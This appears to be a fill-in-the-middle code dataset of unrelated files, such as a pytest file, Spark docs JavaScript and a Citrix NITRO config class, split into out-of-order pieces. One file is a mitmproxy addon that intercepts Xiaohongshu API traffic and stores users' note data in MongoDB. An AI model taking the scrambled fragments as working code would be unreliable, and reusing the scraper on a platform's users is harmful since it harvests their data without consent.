let x5 = atomic_or_relaxed(ptr_a5, b);
assert!(x1 == 1);
assert!(x2 == 1);
assert!(x3 == 1);
assert!(x4 == 1);
assert!(x5 == 1);
assert!(*ptr_a1 == c);
assert!(*ptr_a2 == c);
assert!(*ptr_a3 == c);
assert!(*ptr_a4 == c);
assert!(*ptr_a5 == c);
}
} |
|
__init__.py | from .conf import Configuration, parse_config, read_config
from .model import OpenAmundsen, Model
from . import constants, errors, terrain
# Get version (method as used by matplotlib: https://github.com/matplotlib/matplotlib/blob/bcc1ce8461f5b6e874baaaa02ef776d0243a4abe/lib/matplotlib/__init__.py#L133-L151)
def __getattr__(name):
if name == '__version__':
from pathlib import Path
import setuptools_scm
global __version__
root = Path(__file__).resolve().parents[1]
if (root / '.git').exists() and not (root / '.git/shallow').exists():
__version__ = setuptools_scm.get_version(
root=root,
version_scheme='post-release',
fallback_version='0.0.0+UNKNOWN',
)
else:
|
return __version__
raise AttributeError(f'module {__name__!r} has no attribute {name!r}')
__all__ = [
'OpenAmundsen',
'Configuration',
'parse_config',
'read_config',
]
| try:
from . import _version
__version__ = _version.version
except ImportError:
__version__ = '0.0.0+UNKNOWN' |
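The __getattr__ above uses PEP 562 (module-level __getattr__), so the potentially slow setuptools_scm call runs only on first attribute access and is then cached via the global assignment; a usage sketch, assuming the package is importable:

import openamundsen
print(openamundsen.__version__)   # first access triggers the lazy lookup
print(openamundsen.__version__)   # second access hits the cached global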
test_templates.py | import logging
import pathlib
from unittest import mock
from cabinetry import templates
@mock.patch("cabinetry.route.apply_to_all_templates")
@mock.patch("cabinetry.templates.builder._Builder")
def test_build(mock_builder, mock_apply):
config = {"General": {"HistogramFolder": "path/", "InputPath": "file.root"}}
method = "uproot"
# no router
templates.build(config, method=method)
assert mock_builder.call_args_list == [
((pathlib.Path("path/"), "file.root", method), {})
]
assert mock_apply.call_count == 1
config_call, func_call = mock_apply.call_args[0]
assert config_call == config
assert func_call._extract_mock_name() == "_Builder()._create_histogram"
assert mock_apply.call_args[1] == {"match_func": None}
# including a router
mock_router = mock.MagicMock()
templates.build(config, method=method, router=mock_router)
# verify wrapper was set
assert (
mock_router.template_builder_wrapper._extract_mock_name()
== "_Builder()._wrap_custom_template_builder"
) | assert func_call._extract_mock_name() == "_Builder()._create_histogram"
assert mock_apply.call_args[1] == {
"match_func": mock_router._find_template_builder_match
}
@mock.patch("cabinetry.route.apply_to_all_templates")
@mock.patch("cabinetry.templates.collector._collector", return_value="func")
def test_collect(mock_collector, mock_apply, caplog):
caplog.set_level(logging.DEBUG)
config = {
"General": {
"HistogramFolder": "path/",
"InputPath": "f.root:{VariationPath}",
"VariationPath": "nominal",
}
}
method = "uproot"
templates.collect(config, method=method)
assert mock_collector.call_args_list == [
((pathlib.Path("path/"), "f.root:{VariationPath}", "nominal", method), {})
]
assert mock_apply.call_args_list == [((config, "func"), {})]
caplog.clear()
# no VariationPath in general settings
config = {
"General": {"HistogramFolder": "path/", "InputPath": "f.root:{VariationPath}"}
}
templates.collect(config, method=method)
assert 'no VariationPath specified in general settings, defaulting to ""' in [
rec.message for rec in caplog.records
]
assert mock_collector.call_args == (
(pathlib.Path("path/"), "f.root:{VariationPath}", "", method),
{},
)
caplog.set_level(logging.DEBUG)
@mock.patch("cabinetry.route.apply_to_all_templates")
@mock.patch("cabinetry.templates.postprocessor._postprocessor", return_value="func")
def test_run(mock_postprocessor, mock_apply):
config = {"General": {"HistogramFolder": "path/"}}
templates.postprocess(config)
assert mock_postprocessor.call_args_list == [((pathlib.Path("path/"),), {})]
assert mock_apply.call_args_list == [((config, "func"), {})] |
assert mock_apply.call_count == 2 # 1 from before
config_call, func_call = mock_apply.call_args[0]
assert config_call == config |
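These tests lean on unittest.mock's call_args, which behaves like an (args, kwargs) pair; a minimal standalone sketch of the unpacking pattern used in test_build above:

from unittest import mock

m = mock.MagicMock()
m('config', 'func', match_func=None)
args, kwargs = m.call_args        # call_args unpacks like (args, kwargs)
assert args == ('config', 'func')
assert kwargs == {'match_func': None}
assert m.call_args[0] == args     # index 0 is the positional-argument tuple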
main.js | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/* Custom JavaScript code in the MarkDown docs */
// Enable language-specific code tabs
function | () {
var counter = 0;
var langImages = {
"scala": "img/scala-sm.png",
"python": "img/python-sm.png",
"java": "img/java-sm.png"
};
$("div.codetabs").each(function () {
$(this).addClass("tab-content");
// Insert the tab bar
var tabBar = $('<ul class="nav nav-tabs" data-tabs="tabs"></ul>');
$(this).before(tabBar);
// Add each code sample to the tab bar:
var codeSamples = $(this).children("div");
codeSamples.each(function () {
$(this).addClass("tab-pane");
var lang = $(this).data("lang");
var image = $(this).data("image");
var label = $(this).data("label");
var notabs = $(this).data("notabs");
if (label == null) {
var capitalizedLang = lang.substr(0, 1).toUpperCase() + lang.substr(1);
label = capitalizedLang;
}
lang = lang.replace(/ /g, '');
var id = "tab_" + label.replace(/ /g, '_') + "_" + counter;
$(this).attr("id", id);
if (image != null && langImages[lang]) {
var buttonLabel = "<img src='" + langImages[lang] + "' alt='" + label + "' />";
} else if (notabs == null) {
var buttonLabel = "<b>" + label + "</b>";
} else {
var buttonLabel = ""
}
tabBar.append(
'<li><a href="#' + id + '">' + buttonLabel + '</a></li>'
);
});
codeSamples.first().addClass("active");
tabBar.children("li").first().addClass("active");
counter++;
});
$("ul.nav-tabs a").click(function (e) {
// Toggling a tab should switch all tabs corresponding to the same language
// while retaining the scroll position
e.preventDefault();
var scrollOffset = $(this).offset().top - $(document).scrollTop();
$(this).tab('show');
$(document).scrollTop($(this).offset().top - scrollOffset);
});
$("table").each(function () {
$(this).addClass("table table-bordered");
});
}
// A script to fix internal hash links because we have an overlapping top bar.
// Based on https://github.com/twitter/bootstrap/issues/193#issuecomment-2281510
function maybeScrollToHash() {
if (window.location.hash && $(window.location.hash).length) {
var newTop = $(window.location.hash).offset().top - 57;
$(window).scrollTop(newTop);
}
}
$(function () {
codeTabs();
// Display anchor links when hovering over headers. For documentation of the
// configuration options, see the AnchorJS documentation.
anchors.options = {
placement: 'left'
};
anchors.add();
$(window).bind('hashchange', function () {
maybeScrollToHash();
});
// Scroll now too in case we had opened the page on a hash, but wait a bit because some browsers
// will try to do *their* initial scroll after running the onReady handler.
$(window).load(function () {
setTimeout(function () {
maybeScrollToHash();
}, 25);
});
});
| codeTabs |
xhs_wechat_noteid_script.py | import json
import pymongo
from config import *
def | (flow):
global collection
client = pymongo.MongoClient(MONGO_URL)
db = client[WECHAT_XHS_MONGO_DB]
collection = db[WECHAT_XHS_NOTE_MONGO_COLLECTION]
url1 = 'https://www.xiaohongshu.com/sapi/wx_mp_api/sns/v1/search/notes?'
url2 = 'https://www.xiaohongshu.com/fe_api/burdock/v1/page/'
if flow.request.url.startswith(url1):
# Parse the response data
print(flow.request.url)
notes = json.loads(flow.response.text)["data"]["notes"]
for note in notes:
note_id = note["id"]
img_list = note["images_list"]
title = note["title"]
user = note["user"]
content = {
"note_id": note_id,
"img_list": img_list,
"title": title,
"user":user
}
collection.insert_one(content)  # insert() is deprecated; insert_one() is the modern PyMongo call
elif flow.request.url.startswith(url2):
print(flow.request.url)
notes = json.loads(flow.response.text)["data"]
for note in notes:
note_id = note["id"]
img_list = note["cover"]
title = note["title"]
user = note["user"]
content = {
"note_id": note_id,
"img_list": img_list,
"title": title,
"user": user
}
collection.insert_one(content)  # insert() is deprecated; insert_one() is the modern PyMongo call
| response |
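The script above follows the mitmproxy addon convention (a module-level response(flow) hook), so it is meant to be loaded by mitmdump rather than run directly; a usage sketch:

# Load the addon and route the WeChat mini-program traffic through the proxy
# (proxy host/port and device setup are deployment-specific):
#   mitmdump -s xhs_wechat_noteid_script.py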
index.js | "use strict"; | exports.__esModule = true;
var tslib_1 = require("tslib");
tslib_1.__exportStar(require("../__internal__/cjs-src/icons/IconTie/IconTie"), exports); |
|
appflowparam.py | #
# Copyright (c) 2021 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class appflowparam(base_resource) :
""" Configuration for AppFlow parameter resource. """
def __init__(self) :
self._templaterefresh = None
self._appnamerefresh = None
self._flowrecordinterval = None
self._securityinsightrecordinterval = None
self._udppmtu = None
self._httpurl = None
self._aaausername = None
self._httpcookie = None
self._httpreferer = None
self._httpmethod = None
self._httphost = None
self._httpuseragent = None
self._clienttrafficonly = None
self._httpcontenttype = None
self._httpauthorization = None
self._httpvia = None
self._httpxforwardedfor = None
self._httplocation = None
self._httpsetcookie = None
self._httpsetcookie2 = None
self._connectionchaining = None
self._httpdomain = None
self._skipcacheredirectionhttptransaction = None
self._identifiername = None
self._identifiersessionname = None
self._observationdomainid = None
self._observationdomainname = None
self._subscriberawareness = None
self._subscriberidobfuscation = None
self._subscriberidobfuscationalgo = None
self._gxsessionreporting = None
self._securityinsighttraffic = None
self._cacheinsight = None
self._videoinsight = None
self._httpquerywithurl = None
self._urlcategory = None
self._lsnlogging = None
self._cqareporting = None
self._emailaddress = None
self._usagerecordinterval = None
self._websaasappusagereporting = None
self._metrics = None
self._events = None
self._auditlogs = None
self._observationpointid = None
self._distributedtracing = None
self._disttracingsamplingrate = None
self._tcpattackcounterinterval = None
self._logstreamovernsip = None
self._analyticsauthtoken = None
self._timeseriesovernsip = None
self._builtin = None
self._feature = None
self._tcpburstreporting = None
self._tcpburstreportingthreshold = None
@property
def templaterefresh(self) :
r"""Refresh interval, in seconds, at which to export the template data. Because data transmission is in UDP, the templates must be resent at regular intervals.<br/>Default value: 600<br/>Minimum length = 60<br/>Maximum length = 3600.
"""
try :
return self._templaterefresh
except Exception as e:
raise e
@templaterefresh.setter
def templaterefresh(self, templaterefresh) :
r"""Refresh interval, in seconds, at which to export the template data. Because data transmission is in UDP, the templates must be resent at regular intervals.<br/>Default value: 600<br/>Minimum length = 60<br/>Maximum length = 3600
"""
try :
self._templaterefresh = templaterefresh
except Exception as e:
raise e
@property
def appnamerefresh(self) :
r"""Interval, in seconds, at which to send Appnames to the configured collectors. Appname refers to the name of an entity (virtual server, service, or service group) in the Citrix ADC.<br/>Default value: 600<br/>Minimum length = 60<br/>Maximum length = 3600.
"""
try :
return self._appnamerefresh
except Exception as e:
raise e
@appnamerefresh.setter
def appnamerefresh(self, appnamerefresh) :
r"""Interval, in seconds, at which to send Appnames to the configured collectors. Appname refers to the name of an entity (virtual server, service, or service group) in the Citrix ADC.<br/>Default value: 600<br/>Minimum length = 60<br/>Maximum length = 3600
"""
try :
self._appnamerefresh = appnamerefresh
except Exception as e:
raise e
@property
def flowrecordinterval(self) :
r"""Interval, in seconds, at which to send flow records to the configured collectors.<br/>Default value: 60<br/>Minimum length = 60<br/>Maximum length = 3600.
"""
try :
return self._flowrecordinterval
except Exception as e:
raise e
@flowrecordinterval.setter
def flowrecordinterval(self, flowrecordinterval) :
r"""Interval, in seconds, at which to send flow records to the configured collectors.<br/>Default value: 60<br/>Minimum length = 60<br/>Maximum length = 3600
"""
try :
self._flowrecordinterval = flowrecordinterval
except Exception as e:
raise e
@property
def securityinsightrecordinterval(self) :
r"""Interval, in seconds, at which to send security insight flow records to the configured collectors.<br/>Default value: 600<br/>Minimum length = 60<br/>Maximum length = 3600.
"""
try :
return self._securityinsightrecordinterval
except Exception as e:
raise e
@securityinsightrecordinterval.setter
def securityinsightrecordinterval(self, securityinsightrecordinterval) :
r"""Interval, in seconds, at which to send security insight flow records to the configured collectors.<br/>Default value: 600<br/>Minimum length = 60<br/>Maximum length = 3600
"""
try :
self._securityinsightrecordinterval = securityinsightrecordinterval
except Exception as e:
raise e
@property
def udppmtu(self) :
r"""MTU, in bytes, for IPFIX UDP packets.<br/>Default value: 1472<br/>Minimum length = 128<br/>Maximum length = 1472.
"""
try :
return self._udppmtu
except Exception as e:
raise e
@udppmtu.setter
def udppmtu(self, udppmtu) :
r"""MTU, in bytes, for IPFIX UDP packets.<br/>Default value: 1472<br/>Minimum length = 128<br/>Maximum length = 1472
"""
try :
self._udppmtu = udppmtu
except Exception as e:
raise e
@property
def httpurl(self) :
r"""Include the http URL that the Citrix ADC received from the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpurl
except Exception as e:
raise e
@httpurl.setter
def httpurl(self, httpurl) :
r"""Include the http URL that the Citrix ADC received from the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpurl = httpurl
except Exception as e:
raise e
@property
def aaausername(self) :
r"""Enable AppFlow AAA Username logging.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._aaausername
except Exception as e:
raise e
@aaausername.setter
def aaausername(self, aaausername) :
r"""Enable AppFlow AAA Username logging.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._aaausername = aaausername
except Exception as e:
raise e
@property
def httpcookie(self) :
r"""Include the cookie that was in the HTTP request the appliance received from the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpcookie
except Exception as e:
raise e
@httpcookie.setter
def httpcookie(self, httpcookie) :
r"""Include the cookie that was in the HTTP request the appliance received from the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpcookie = httpcookie
except Exception as e:
raise e
@property
def httpreferer(self) :
r"""Include the web page that was last visited by the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpreferer
except Exception as e:
raise e
@httpreferer.setter
def httpreferer(self, httpreferer) :
r"""Include the web page that was last visited by the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpreferer = httpreferer
except Exception as e:
raise e
@property
def httpmethod(self) :
r"""Include the method that was specified in the HTTP request that the appliance received from the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpmethod
except Exception as e:
raise e
@httpmethod.setter
def httpmethod(self, httpmethod) :
r"""Include the method that was specified in the HTTP request that the appliance received from the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpmethod = httpmethod
except Exception as e:
raise e
@property
def httphost(self) :
r"""Include the host identified in the HTTP request that the appliance received from the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httphost
except Exception as e:
raise e
@httphost.setter
def httphost(self, httphost) :
r"""Include the host identified in the HTTP request that the appliance received from the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httphost = httphost
except Exception as e:
raise e
@property
def httpuseragent(self) :
r"""Include the client application through which the HTTP request was received by the Citrix ADC.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpuseragent
except Exception as e:
raise e
@httpuseragent.setter
def httpuseragent(self, httpuseragent) :
r"""Include the client application through which the HTTP request was received by the Citrix ADC.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpuseragent = httpuseragent
except Exception as e:
raise e
@property
def clienttrafficonly(self) :
r"""Generate AppFlow records for only the traffic from the client.<br/>Default value: NO<br/>Possible values = YES, NO.
"""
try :
return self._clienttrafficonly
except Exception as e:
raise e
@clienttrafficonly.setter
def clienttrafficonly(self, clienttrafficonly) :
r"""Generate AppFlow records for only the traffic from the client.<br/>Default value: NO<br/>Possible values = YES, NO
"""
try :
self._clienttrafficonly = clienttrafficonly
except Exception as e:
raise e
@property
def httpcontenttype(self) :
r"""Include the HTTP Content-Type header sent from the server to the client to determine the type of the content sent.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpcontenttype
except Exception as e:
raise e
@httpcontenttype.setter
def httpcontenttype(self, httpcontenttype) :
r"""Include the HTTP Content-Type header sent from the server to the client to determine the type of the content sent.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpcontenttype = httpcontenttype
except Exception as e:
raise e
@property
def httpauthorization(self) :
r"""Include the HTTP Authorization header information.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpauthorization
except Exception as e:
raise e
@httpauthorization.setter
def httpauthorization(self, httpauthorization) :
r"""Include the HTTP Authorization header information.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpauthorization = httpauthorization
except Exception as e:
raise e
@property
def httpvia(self) :
r"""Include the httpVia header which contains the IP address of proxy server through which the client accessed the server.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpvia
except Exception as e:
raise e
@httpvia.setter
def httpvia(self, httpvia) :
r"""Include the httpVia header which contains the IP address of proxy server through which the client accessed the server.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpvia = httpvia
except Exception as e:
raise e
@property
def httpxforwardedfor(self) :
r"""Include the httpXForwardedFor header, which contains the original IP Address of the client using a proxy server to access the server.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpxforwardedfor
except Exception as e:
raise e
@httpxforwardedfor.setter
def httpxforwardedfor(self, httpxforwardedfor) :
r"""Include the httpXForwardedFor header, which contains the original IP Address of the client using a proxy server to access the server.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpxforwardedfor = httpxforwardedfor
except Exception as e:
raise e
@property
def httplocation(self) :
r"""Include the HTTP location headers returned from the HTTP responses.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httplocation
except Exception as e:
raise e
@httplocation.setter
def httplocation(self, httplocation) :
r"""Include the HTTP location headers returned from the HTTP responses.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httplocation = httplocation
except Exception as e:
raise e
@property
def httpsetcookie(self) :
r"""Include the Set-cookie header sent from the server to the client in response to a HTTP request.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpsetcookie
except Exception as e:
raise e
@httpsetcookie.setter
def httpsetcookie(self, httpsetcookie) :
r"""Include the Set-cookie header sent from the server to the client in response to a HTTP request.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpsetcookie = httpsetcookie
except Exception as e:
raise e
@property
def httpsetcookie2(self) :
r"""Include the Set-cookie header sent from the server to the client in response to a HTTP request.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpsetcookie2
except Exception as e:
raise e
@httpsetcookie2.setter
def httpsetcookie2(self, httpsetcookie2) :
r"""Include the Set-cookie header sent from the server to the client in response to a HTTP request.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpsetcookie2 = httpsetcookie2
except Exception as e:
raise e
@property
def connectionchaining(self) :
r"""Enable connection chaining so that the client server flows of a connection are linked. Also the connection chain ID is propagated across Citrix ADCs, so that in a multi-hop environment the flows belonging to the same logical connection are linked. This id is also logged as part of appflow record.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._connectionchaining
except Exception as e:
raise e
@connectionchaining.setter
def connectionchaining(self, connectionchaining) :
r"""Enable connection chaining so that the client server flows of a connection are linked. Also the connection chain ID is propagated across Citrix ADCs, so that in a multi-hop environment the flows belonging to the same logical connection are linked. This id is also logged as part of appflow record.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._connectionchaining = connectionchaining
except Exception as e:
raise e
@property
def httpdomain(self) :
r"""Include the http domain request to be exported.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpdomain
except Exception as e:
raise e
@httpdomain.setter
def httpdomain(self, httpdomain) :
r"""Include the http domain request to be exported.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpdomain = httpdomain
except Exception as e:
raise e
@property
def skipcacheredirectionhttptransaction(self) :
r"""Skip Cache http transaction. This HTTP transaction is specific to Cache Redirection module. In Case of Cache Miss there will be another HTTP transaction initiated by the cache server.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._skipcacheredirectionhttptransaction
except Exception as e:
raise e
@skipcacheredirectionhttptransaction.setter
def skipcacheredirectionhttptransaction(self, skipcacheredirectionhttptransaction) :
r"""Skip Cache http transaction. This HTTP transaction is specific to Cache Redirection module. In Case of Cache Miss there will be another HTTP transaction initiated by the cache server.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._skipcacheredirectionhttptransaction = skipcacheredirectionhttptransaction
except Exception as e:
raise e
@property
def identifiername(self) :
r"""Include the stream identifier name to be exported.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._identifiername
except Exception as e:
raise e
@identifiername.setter
def identifiername(self, identifiername) :
r"""Include the stream identifier name to be exported.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._identifiername = identifiername
except Exception as e:
raise e
@property
def identifiersessionname(self) :
r"""Include the stream identifier session name to be exported.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._identifiersessionname
except Exception as e:
raise e
@identifiersessionname.setter
def identifiersessionname(self, identifiersessionname) :
r"""Include the stream identifier session name to be exported.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._identifiersessionname = identifiersessionname
except Exception as e:
raise e
@property
def observationdomainid(self) :
r"""An observation domain groups a set of Citrix ADCs based on deployment: cluster, HA etc. A unique Observation Domain ID is required to be assigned to each such group.<br/>Default value: 0<br/>Minimum length = 1000.
"""
try :
return self._observationdomainid
except Exception as e:
raise e
@observationdomainid.setter
def observationdomainid(self, observationdomainid) :
r"""An observation domain groups a set of Citrix ADCs based on deployment: cluster, HA etc. A unique Observation Domain ID is required to be assigned to each such group.<br/>Default value: 0<br/>Minimum length = 1000
"""
try :
self._observationdomainid = observationdomainid
except Exception as e:
raise e
@property
def observationdomainname(self) :
r"""Name of the Observation Domain defined by the observation domain ID.<br/>Maximum length = 127.
"""
try :
return self._observationdomainname
except Exception as e:
raise e
@observationdomainname.setter
def observationdomainname(self, observationdomainname) :
r"""Name of the Observation Domain defined by the observation domain ID.<br/>Maximum length = 127
"""
try :
self._observationdomainname = observationdomainname
except Exception as e:
raise e
@property
def subscriberawareness(self) :
r"""Enable this option for logging end user MSISDN in L4/L7 appflow records.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._subscriberawareness
except Exception as e:
raise e
@subscriberawareness.setter
def subscriberawareness(self, subscriberawareness) :
r"""Enable this option for logging end user MSISDN in L4/L7 appflow records.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._subscriberawareness = subscriberawareness
except Exception as e:
raise e
@property
def subscriberidobfuscation(self) :
r"""Enable this option for obfuscating MSISDN in L4/L7 appflow records.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._subscriberidobfuscation
except Exception as e:
raise e
@subscriberidobfuscation.setter
def subscriberidobfuscation(self, subscriberidobfuscation) :
r"""Enable this option for obfuscating MSISDN in L4/L7 appflow records.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._subscriberidobfuscation = subscriberidobfuscation
except Exception as e:
raise e
@property
def subscriberidobfuscationalgo(self) :
r"""Algorithm(MD5 or SHA256) to be used for obfuscating MSISDN.<br/>Default value: MD5<br/>Possible values = MD5, SHA256.
"""
try :
return self._subscriberidobfuscationalgo
except Exception as e:
raise e
@subscriberidobfuscationalgo.setter
def subscriberidobfuscationalgo(self, subscriberidobfuscationalgo) :
r"""Algorithm(MD5 or SHA256) to be used for obfuscating MSISDN.<br/>Default value: MD5<br/>Possible values = MD5, SHA256
"""
try :
self._subscriberidobfuscationalgo = subscriberidobfuscationalgo
except Exception as e:
raise e
@property
def gxsessionreporting(self) :
r"""Enable this option for Gx session reporting.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._gxsessionreporting
except Exception as e:
raise e
@gxsessionreporting.setter
def gxsessionreporting(self, gxsessionreporting) :
r"""Enable this option for Gx session reporting.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._gxsessionreporting = gxsessionreporting
except Exception as e:
raise e
@property
def securityinsighttraffic(self) :
r"""Enable/disable the feature individually on appflow action.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._securityinsighttraffic
except Exception as e:
raise e
@securityinsighttraffic.setter
def securityinsighttraffic(self, securityinsighttraffic) :
r"""Enable/disable the feature individually on appflow action.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._securityinsighttraffic = securityinsighttraffic
except Exception as e:
raise e
@property
def cacheinsight(self) :
r"""Flag to determine whether cache records need to be exported or not. If this flag is true and IC is enabled, cache records are exported instead of L7 HTTP records.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._cacheinsight
except Exception as e:
raise e
@cacheinsight.setter
def cacheinsight(self, cacheinsight) :
r"""Flag to determine whether cache records need to be exported or not. If this flag is true and IC is enabled, cache records are exported instead of L7 HTTP records.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._cacheinsight = cacheinsight
except Exception as e:
raise e
@property
def videoinsight(self) :
r"""Enable/disable the feature individually on appflow action.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._videoinsight
except Exception as e:
raise e
@videoinsight.setter
def videoinsight(self, videoinsight) :
r"""Enable/disable the feature individually on appflow action.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._videoinsight = videoinsight
except Exception as e:
raise e
@property
def httpquerywithurl(self) :
r"""Include the HTTP query segment along with the URL that the Citrix ADC received from the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpquerywithurl
except Exception as e:
raise e
@httpquerywithurl.setter
def httpquerywithurl(self, httpquerywithurl) :
r"""Include the HTTP query segment along with the URL that the Citrix ADC received from the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpquerywithurl = httpquerywithurl
except Exception as e:
raise e
@property
def urlcategory(self) :
r"""Include the URL category record.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._urlcategory
except Exception as e:
raise e
@urlcategory.setter
def urlcategory(self, urlcategory) :
r"""Include the URL category record.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._urlcategory = urlcategory
except Exception as e:
raise e
@property
def lsnlogging(self) :
r"""On enabling this option, the Citrix ADC will send the Large Scale Nat(LSN) records to the configured collectors.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._lsnlogging
except Exception as e:
raise e
@lsnlogging.setter
def lsnlogging(self, lsnlogging) :
r"""On enabling this option, the Citrix ADC will send the Large Scale Nat(LSN) records to the configured collectors.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._lsnlogging = lsnlogging
except Exception as e:
raise e
@property
def cqareporting(self) :
r"""TCP CQA reporting enable/disable knob.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._cqareporting
except Exception as e:
raise e
@cqareporting.setter
def cqareporting(self, cqareporting) :
r"""TCP CQA reporting enable/disable knob.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._cqareporting = cqareporting
except Exception as e:
raise e
@property
def emailaddress(self) :
r"""Enable AppFlow user email-id logging.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._emailaddress
except Exception as e:
raise e
@emailaddress.setter
def emailaddress(self, emailaddress) :
r"""Enable AppFlow user email-id logging.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._emailaddress = emailaddress
except Exception as e:
raise e
@property
def usagerecordinterval(self) :
r"""On enabling this option, the NGS will send bandwidth usage record to configured collectors.<br/>Default value: 0<br/>Maximum length = 7200.
"""
try :
return self._usagerecordinterval
except Exception as e:
raise e
@usagerecordinterval.setter
def usagerecordinterval(self, usagerecordinterval) :
r"""On enabling this option, the NGS will send bandwidth usage record to configured collectors.<br/>Default value: 0<br/>Maximum length = 7200
"""
try :
self._usagerecordinterval = usagerecordinterval
except Exception as e:
raise e
@property
def websaasappusagereporting(self) :
